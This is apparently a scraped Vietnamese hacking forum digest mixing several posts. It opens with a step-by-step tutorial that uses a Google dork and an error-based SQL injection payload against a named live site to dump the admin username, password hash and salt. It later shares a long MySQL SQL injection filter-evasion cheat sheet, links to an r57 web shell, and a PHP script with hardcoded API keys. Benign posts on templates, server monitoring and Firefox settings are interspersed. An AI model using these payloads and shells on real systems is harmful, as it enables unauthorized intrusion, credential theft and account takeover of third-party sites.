[TUT] Inferno vBShout SQLI 0day <= 2.5.2

Đầu tiên vào google.vn search dork sau:

inurl:infernoshout.php?do=options&area=commands

Ra được 1 nùi site. Mình chọn site này làm Victim : http://www.cinemekan.com/infernoshout.php?do=options&area=commands
 

Ô Command Input nhập:

' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#

 Ô Command Output thì nhập cái gì cũng được. Sau đó nhấn Save Settings

Nó sẽ hiện ra trang DB error

Nhấn Ctrl + U trên bàn phím. Và kéo xuống dưới cùng sẽ ra 1 trang chứa thông thông user + password+ salt của nó .

Xong bây h chúng ta có thể login bằng cookie vào được tài khoản admin rùi.
tut ngắn gọn, có gì sai mong được mọi người góp ý. Chúc mọi người thành công và vui vẻ

Tut By X-T

Nguồn: VHB

SQL - TUT Magic convert & Error based

Magic convert :

http://www.mediafire.com/?leuyke4493l30fs

http://www.mediafire.com/?3t414vzrpssd3g1

Nguồn: VHB

Tutorial: Get nick chatbox from Blogspot

Tutorial: Get nick chatbox from Blogspot 

(ChangUonDyU Chatbox Exploit)

 

Cũng khá là tình cờ khi Juno vào xem thống kê lượt ghé thăm blog

Vào xem phần Lưu lượng truy cập => URL tham chiếu. Chợt thấy link chatbox VNH trong đó.

Đoán ra là có bé nào lại paste link blog mình lên chatbox.

Nhưng mà cái hay ở chỗ đoạn truy vấn mà blogspot get được...

Tiếp theo như nào thì mọi người xem TUT sẽ hiểu

http://www.mediafire.com/?pcyd0zhmlpf1njw

Pass Unlock: (liên hệ email junookyo@gmail.com)

P/S: ChangUonDyU chatbox thì khá nhiều bug & exploit, nhưng bug kiểu Juno thì chắc chỉ có một .

Coming Soon Template - trang web đang xây dựng có hiệu ứng chữ trượt

Magnesium – Responsive Coming Soon Template

Live Demo
http://demo.sinhvienit.net/js_html_f...comingsoon119/

Magnesium is a responsive template, which means you can use it with your phone, tablet, netbook, laptop, desktop, even with your fridge (you just need a pretty good one).


The template is built with jQuery, which quarantees your visitors to be amazed. Sliding and fading animations will make sure your visitor will visit your page more than once!


Coded with HTML5 & CSS3 . Newest technologies are used, but even IE is supported.
Javascript is ultimately configurable and the template is very easy to edit and translate to fit in your needs.

Download:

http://sinhvienit.net/@forum/attachment/24475/1347340509/SinhVienIT.Net---Magnesium.zip

Share Code Shell r57 fixed all - Bản mới nhất

Source Code:

http://xhacker.me/offline.txt

Or Download:

http://www.mediafire.com/?zr00vgs72e6mk5c

Share code WAP (banana)

 

Download:  http://www.mediafire.com/?1rmw6v1un1rz3cv

Pass: vnhgroup

Nguồn: VNH Group

Code treo nick Yahoo (có status)

Demo: http://lythongac.net/treo.php

<?php
#----------------------------------------------------->
# ToolName      : Treo nick Yh
# Programmer     : Trieu Huy hoang
# Version        : 1.0
# Mysite        : http://trieuhuyhoang.net
# Home            : http://vnhack.us
# Date             : 11/09/2012
#--------------------------

if($_GET['act']=='update')
{
$username = $_POST['username']; // Your usernameid
$password = $_POST['password']; // Your password
$consumer_key = "dj0yJmk9bUNKZlNoMXFVYUZQJmQ9WVdrOVJWSlNRa0kyTlRJbWNHbzlNVGMwTnpNNE1qYzJNZy0tJnM9Y29uc3VtZXJzZWNyZXQmeD03NQ--"; //có thể thay thế nếu muốn
$secret_key   = "af4af35d2005e483e293f7afddfb2986d30f4c95"; // có thể thay thế nếu muốn
$state    = 2; //0 : online //2 : busy //999 idle
$status   = $_POST['status']; //Status



$header[] = 'Content-type: application/json; charset=utf-8';
function curl($url, $method = 'get', $header = null, $postdata = null, $includeheader=false, $timeout = 60)
{
$s = curl_init();
$debug = false;
curl_setopt($s,CURLOPT_URL, $url);
if ($header)
curl_setopt($s,CURLOPT_HTTPHEADER, $header);

if ($debug)
curl_setopt($s,CURLOPT_VERBOSE, TRUE);

curl_setopt($s,CURLOPT_TIMEOUT, $timeout);
curl_setopt($s,CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($s,CURLOPT_MAXREDIRS, 3);
curl_setopt($s,CURLOPT_RETURNTRANSFER, true);
curl_setopt($s,CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($s,CURLOPT_COOKIEJAR, 'cookie.txt');
        curl_setopt($s,CURLOPT_COOKIEFILE, 'cookie.txt');

if(strtolower($method) == 'post')
{
curl_setopt($s,CURLOPT_POST, true);
curl_setopt($s,CURLOPT_POSTFIELDS, $postdata);
}
else if(strtolower($method) == 'delete')
{
curl_setopt($s,CURLOPT_CUSTOMREQUEST, 'DELETE');
}
else if(strtolower($method) == 'put')
{
curl_setopt($s,CURLOPT_CUSTOMREQUEST, 'PUT');
curl_setopt($s,CURLOPT_POSTFIELDS, $postdata);
}

curl_setopt($s,CURLOPT_HEADER, $includeheader);
curl_setopt($s,CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1');
curl_setopt($s, CURLOPT_SSL_VERIFYPEER, false);

$html = curl_exec($s);
$status = curl_getinfo($s, CURLINFO_HTTP_CODE);

curl_close($s);

return $html;
}

        $url1 = 'https://login.yahoo.com/WSLogin/V1/get_auth_token';
        $url1 .= '?login='.$username;
        $url1 .= '&passwd='.$password;
        $url1 .= '&oauth_consumer_key='.$consumer_key;        
        $rs = curl($url1);
        $rs = trim(str_replace('RequestToken=', '', $rs));
        $url = 'https://api.login.yahoo.com/oauth/v2/get_token';
        $url .= '?oauth_consumer_key='.$consumer_key;        
        $url .= '&oauth_nonce='. uniqid(rand());
        $url .= '&oauth_signature='.$secret_key.'%26';
        $url .= '&oauth_signature_method=PLAINTEXT';
        $url .= '&oauth_timestamp='. time();
        $url .= '&oauth_token='. $rs;
        $url .= '&oauth_version=1.0';    
        $rs1 = curl($url);
        echo "<textarea>".$rs1."</textarea><br>";
                
        if (stripos($rs1, 'oauth_token') === false)
            {
            $rs1;
            return false;
            }

            //parse access token
            $tmp = explode('&', $rs1);
            foreach ($tmp as $row)
            {
            $col = explode('=', $row);
            $access_token[$col[0]] = $col[1];
            }
            
            //print_r ($access_token);
            
        //fetch_crumb url
        $url2 = 'http://developer.messenger.yahooapis.com/v1/session';
        $url2 .= '?oauth_consumer_key='.$consumer_key;
        $url2 .= '&oauth_nonce='. uniqid(rand());
        $url2 .= '&oauth_signature='.$secret_key.'%26'. $access_token['oauth_token_secret'];
        $url2 .= '&oauth_signature_method=PLAINTEXT';
        $url2 .= '&oauth_timestamp='. time();
        $url2 .= '&oauth_token='. $access_token['oauth_token'];
        $url2 .= '&oauth_version=1.0';
        
        $rs2 = curl($url2, 'get', $header);
        echo "<textarea>".$rs2."</textarea><br>";
        
    
        //signon url
        $url3 = 'http://developer.messenger.yahooapis.com/v1/session';
        $url3 .= '?oauth_consumer_key='.$consumer_key;
        $url3 .= '&oauth_nonce='. uniqid(rand());
        $url3 .= '&oauth_signature='.$secret_key.'%26'. $access_token['oauth_token_secret'];
        $url3 .= '&oauth_signature_method=PLAINTEXT';
        $url3 .= '&oauth_timestamp='. time();
        $url3 .= '&oauth_token='. $access_token['oauth_token'];
        $url3 .= '&oauth_version=1.0';
        $url3 .= '&notifyServerToken=1';
        
        $postdata = '{"presenceState" : '. $state. ', "presenceMessage" : "'. $status. '"}';

        $rs3 = curl($url3, 'post', $header, $postdata, true);
        echo "<textarea>".$rs3."</textarea><br>";
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 <link rel="stylesheet" type="text/css" href="style.css">
<meta name="author" content="LyThongAc" />

<title>..:::Treo nick Yahoo 24h:::..</title>

<style>

</style>


</head>

<body id="index" onload="">
<div>
<form action="?act=update" method="post" name="jaja">

<table align="center">

<tr>

<td><span class="method2">UserName</span></td> 

<td><input name="username" type="text" id="boton" onclick="this.select()" value="" size="40px" ></td>

</tr>

<tr>

<td><span class="method2">Password</span>

</td>

<td><input name="password" type="password" id="boton" onclick="this.select()" value="" size="40px" /> </td>

</tr>

<tr>

<td><span class="method2">Status</span>

</td>

<td><input name="status" type="text" id="boton" onclick="this.select()" value="" size="40px" /> </td>

</tr>

<tr>


<td class="titulo style1">

<span class="method2">Action</span></td> 

<td>


  <input name="submit" type="submit" class="button" value="Treo Nick" />
  <input type="reset" class="button" value="Reset" />

  </span></td>

</tr>

</table>
</div>
</form>

<br />

</center> 

PHP Script - kiểm tra tình trạng server và gửi email thông báo khi server down

Script này giúp kiểm tra tình trạng server, service xem nó có đang hoạt động hay không

Ví dụ đoạn code mẫu

<?php 

include("servermonitor.php");
$Monitor = new ServerMonitor();
$Monitor->add("Local server", "sinhvienit.net", 80);

echo $Monitor->run(true);

?>

Ở đây chúng ta sẽ gọi đến lớp ServerMonitor được định nghĩa trong file servermonitor.php

$Monitor->add("Local server", "sinhvienit.net", 80); 

Bạn có thể add nhiều server để kiểm tra cùng lúc. số 80 là cổng của dịch vụ đang chạy cần kiểm tra, thay vì điền domain bạn cũng có thể thay bằng IP của server

$Monitor->setEmail("yourmail@gmail.com"); 

Khi server offline, script này sẽ gửi email thông báo đến bạn.

foreach($results as $result){
    $status = $result->active ? "Online" : "Offline";
    echo $result->name . ': <strong>' . $status . '</strong><br />';
} 

Chạy vòng lặp để xuất ra kết quả tình trạng server

// Bạn nào thích thì có thể phát triển thêm để script có thể tự động kiểm tra

Bật tính năng đọc PDF cho Firefox 15

Mozilla Firefox 15 vừa mới được phát hành cách đây không lâu với hàng loạt tính năng mới. Nếu trước đây Google Chrome tự hào là trình duyệt kiêm trình đọc PDF thì giờ đây Firefox cũng làm được như thế. Trong phiên bản 15 vừa được phát hành Mozilla đã cải tiến và thêm vào tính năng đọc các tập tin PDF ngay trên trình duyệt Firefox với sự hỗ trợ của Flash. Đừng vội mừng vì tính năng này mặc định vẫn chưa được kích hoạt, do đó nếu người dùng muốn sử dụng tính năng này thì phải trải qua vài bước thiết lập cũng tương đối đơn giản. Cách làm như sau:

Đầu tiên bạn phải chắc chắn là trình duyệt Firefox bạn đang dùng là phiên bản 15, bạn có thể tải về cài đặt từ trang chủ của Mozilla hoặc Filehippo hoặc cập nhật tự động từ cửa sổ About của Firefox.

Khi đã cập nhật lên phiên bản Mozilla Firefox 15 rồi thì bạn trên thành address của Firefox, bạn nhập vào dòng lệnh about:config , chú ý rằng sau khi nhấn enter để thực thi câu lệnh trên thì sẽ có một thông báo về mối nguy hiểm khi thiết lập thì bạn nhấn vào I’ll be carefull, I promise! để tiếp tục.

Tại đây có rất nhiều thiết lập, để cho thuận tiện bạn nên sử dụng tính năng tìm kiếm để tìm nhanh hơn, tại ô tìm kiếm bạn nhập vào từ khoá pdfjs.disabled rồi nhấp phải chuột vào kết quả tìm kiếm chọn Toggle chuyển giá trị Value từ True thành False.

Bạn làm tương tự với từ khoá browser.preferences.inContent và chuyển giá trị Value từ False thành True.

Như vậy tính năng xem file PDF đã được bật thành công. Khi bạn nhấn vào một liên kết có phần mở rộng .pdf Firefox sẽ mở trực tiếp tập tin đó ngay trong trình duyệt mà không cần sử dụng thêm các phần mềm nào khác.

Trường hợp máy bạn có cài đặt một ứng dụng hỗ trợ download thì bạn nên loại bỏ định dạng PDF ra khỏi danh sách bắt link để tránh trường hợp ứng dụng này sẽ bắt link và tải về thay vì đọc trực tiếp trên Firefox.

Chúc bạn thành công!


Tham khảo Genk

Share vài code tools UG

http://www.mediafire.com/?qlrfs6amijixx

Nguồn: VNH Group

Video Local Cơ Bản

http://www.4shared.com/get/c05n5a6_/tmtno1.html

Nguồn: VNH Group

SQLi filter evasion cheat sheet

SQLi filter evasion cheat sheet (MySQL)
Basic filter

Comments
‘ or 1=1#
‘ or 1=1– -
‘ or 1=1/* (MySQL < 5.1)
' or 1=1;
' or 1=1 union select 1,2 as `
' or#newline
1='1
' or– -newline
1='1
' /*!50000or*/1='1
' /*!or*/1='1

Prefixes
+ – ~ !
‘ or –+2=- -!!!’2

Operators
^, =, !=, %, /, *, &, &&, |, ||, , >>, <=, <=, ,, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, LEAST, GREATEST, CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL

Whitespaces
%20 %09 %0a %0b %0c %0d %a0 /**/
‘or+(1)sounds/**/like“1“–%a0-
‘union(select(1),tabe_name,(3)from`information_s chema`.`tables`)#

Strings with quotes
SELECT ‘a’
SELECT “a”
SELECT n’a’
SELECT b’1100001′
SELECT _binary’1100001′
SELECT x’61′

Strings without quotes
‘abc’ = 0×616263

Aliases
select pass as alias from users
select pass aliasalias from users
select pass`alias alias`from users

Typecasting
‘ or true = ’1 # or 1=1
‘ or round(pi(),1)+true+true = version() # or 3.1+1+1 = 5.1
‘ or ’1 # or true

Compare operator typecasting
select * from users where ‘a’='b’='c’
select * from users where (‘a’='b’)=’c’
select * from users where (false)=’c’
select * from users where (0)=’c’
select * from users where (0)=0
select * from users where true
select * from users

Authentication bypass ‘=’
select * from users where name = ”=”
select * from users where false = ”
select * from users where 0 = 0
select * from users where true
select * from users

Authentication bypass ‘-’
select * from users where name = ”-”
select * from users where name = 0-0
select * from users where 0 = 0
select * from users where true
select * from users
Function filter

General function filtering
ascii (97)
load_file/*foo*/(0×616263)

Strings with functions
‘abc’ = unhex(616263)
‘abc’ = char(97,98,99)
hex(‘a’) = 61
ascii(‘a’) = 97
ord(‘a’) = 97
‘ABC’ = concat(conv(10,10,36),conv(11,10,36),conv(12,10,36 ))

Strings extracted from gadgets
collation(\N) // binary
collation(user()) // utf8_general_ci
@@time_format // %H:%i:%s
@@binlog_format // MIXED
@@version_comment // MySQL Community Server (GPL)
dayname(from_days(401)) // Monday
dayname(from_days(403)) // Wednesday
monthname(from_days(690)) // November
monthname(from_unixtime(1)) // January
collation(convert((1)using/**/koi8r)) // koi8r_general_ci
(select(collation_name)from(information_schema.col lations)where(id)=2) // latin2_czech_cs

Special characters extracted from gadgets
aes_encrypt(1,12) // 4çh±{?”^c×HéÉEa
des_encrypt(1,2) // ‚GÒ/ïÖk
@@ft_boolean_syntax // + -><()~*:""&|
@@date_format // %Y-%m-%d
@@innodb_log_group_home_dir // .\

Integer representations
false: 0
true: 1
true+true: 2
floor(pi()): 3
ceil(pi()): 4
floor(version()): 5
ceil(version()): 6
ceil(pi()+pi()): 7
floor(version()+pi()): 8
floor(pi()*pi()): 9
ceil(pi()*pi()): 10
concat(true,true): 11
ceil(pi()*pi())+true: 11
ceil(pi()+pi()+version()): 12
floor(pi()*pi()+pi()): 13
ceil(pi()*pi()+pi()): 14
ceil(pi()*pi()+version()): 15
floor(pi()*version()): 16
ceil(pi()*version()): 17
ceil(pi()*version())+true: 18
floor((pi()+pi())*pi()): 19
ceil((pi()+pi())*pi()): 20
ceil(ceil(pi())*version()): 21
concat(true+true,true): 21
ceil(pi()*ceil(pi()+pi())): 22
ceil((pi()+ceil(pi()))*pi()): 23
ceil(pi())*ceil(version()): 24
floor(pi()*(version()+pi())): 25
floor(version()*version()): 26
ceil(version()*version()): 27
ceil(pi()*pi()*pi()-pi()): 28
floor(pi()*pi()*floor(pi())): 29
ceil(pi()*pi()*floor(pi())): 30
concat(floor(pi()),false): 30
floor(pi()*pi()*pi()): 31
ceil(pi()*pi()*pi()): 32
ceil(pi()*pi()*pi())+true: 33
ceil(pow(pi(),pi())-pi()): 34
ceil(pi()*pi()*pi()+pi()): 35
floor(pow(pi(),pi())): 36

@@new: 0
@@log_bin: 1

!pi(): 0
!!pi(): 1
true-~true: 3
log(-cos(pi())): 0
-cos(pi()): 1
coercibility(user()): 3
coercibility(now()): 4

minute(now())
hour(now())
day(now())
week(now())
month(now())
year(now())
quarter(now())
year(@@timestamp)
crc32(true)

Extract substrings
substr(‘abc’,1,1) = ‘a’
substr(‘abc’ from 1 for 1) = ‘a’
substring(‘abc’,1,1) = ‘a’
substring(‘abc’ from 1 for 1) = ‘a’
mid(‘abc’,1,1) = ‘a’
mid(‘abc’ from 1 for 1) = ‘a’
lpad(‘abc’,1,space(1)) = ‘a’
rpad(‘abc’,1,space(1)) = ‘a’
left(‘abc’,1) = ‘a’
reverse(right(reverse(‘abc’),1)) = ‘a’
insert(insert(‘abc’,1,0,space(0)),2,222,space( 0)) = ‘a’
space(0) = trim(version()from(version()))

Search substrings
locate(‘a’,'abc’)
position(‘a’,'abc’)
position(‘a’ IN ‘abc’)
instr(‘abc’,'a’)
substring_index(‘ab’,'b’,1)

Cut substrings
length(trim(leading ‘a’ FROM ‘abc’))
length(replace(‘abc’, ‘a’, ”))

Compare strings
strcmp(‘a’,'a’)
mod(‘a’,'a’)
find_in_set(‘a’,'a’)
field(‘a’,'a’)
count(concat(‘a’,'a’))

String length
length()
bit_length()
char_length()
octet_length()
bit_count()

String case
ucase
lcase
lower
upper
password(‘a’) != password(‘A’)
old_password(‘a’) != old_password(‘A’)
md5(‘a’) != md5(‘A’)
sha(‘a’) != sha(‘A’)
aes_encrypt(‘a’) != aes_encrypt(‘A’)
des_encrypt(‘a’) != des_encrypt(‘A’)
Keyword filter

Connected keyword filtering
(0)union(select(table_name),column_name,…
0/**/union/*!50000select*/table_name`foo`/**/…
0%a0union%a0select%09group_concat(table_name)….
0′union all select all`table_name`foo from`information_schema`. `tables`

OR, AND
‘||1=’1
‘&&1=’1
‘=’
‘-’

OR, AND, UNION
‘ and (select pass from users limit 1)=’secret

OR, AND, UNION, LIMIT
‘ and (select pass from users where id =1)=’a

OR, AND, UNION, LIMIT, WHERE
‘ and (select pass from users group by id having id = 1)=’a

OR, AND, UNION, LIMIT, WHERE, GROUP
‘ and length((select pass from users having substr(pass,1,1)=’a'))

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING
‘ and (select substr(group_concat(pass),1,1) from users)=’a
‘ and substr((select max(pass) from users),1,1)=’a
‘ and substr((select max(replace(pass,’lastpw’,”)) from users),1,1)=’a

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT
‘ and substr(load_file(‘file’),locate(‘DocumentRoo t’,(load_file(‘file’)))+length(‘DocumentRo ot’),10)=’a
‘=” into outfile ‘/var/www/dump.txt

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT, FILE
‘ procedure analyse()#
‘-if(name=’Admin’,1,0)#
‘-if(if(name=’Admin’,1,0),if(substr(pass,1,1)=� �a',1,0),0)#

Control flow
case ‘a’ when ‘a’ then 1 [else 0] end
case when ‘a’='a’ then 1 [else 0] end
if(‘a’='a’,1,0)
ifnull(nullif(‘a’,'a’),1)

Nguồn:
http://websec.wordpress.com/2010/12/...t-sheet-mysql/

Share code Firefox's Start Page (đẹp)

Demo ảnh:

Demo online:

http://www.ghostclub.info/code/firefox/

 Download:

http://www.mediafire.com/?g1sb5zgqlntysow

Pass Unlock:

junookyo

P/S: Code này RIP ở Firefox (thấy đẹp nên zip chơi). Đã edit, thêm đoạn code check khung search (ko nhập gì mà ENTER sẽ hiện alert). Thích hợp làm trang home, có thể sửa các URL ở khung button phía dưới! Nói chung là code đẹp :D.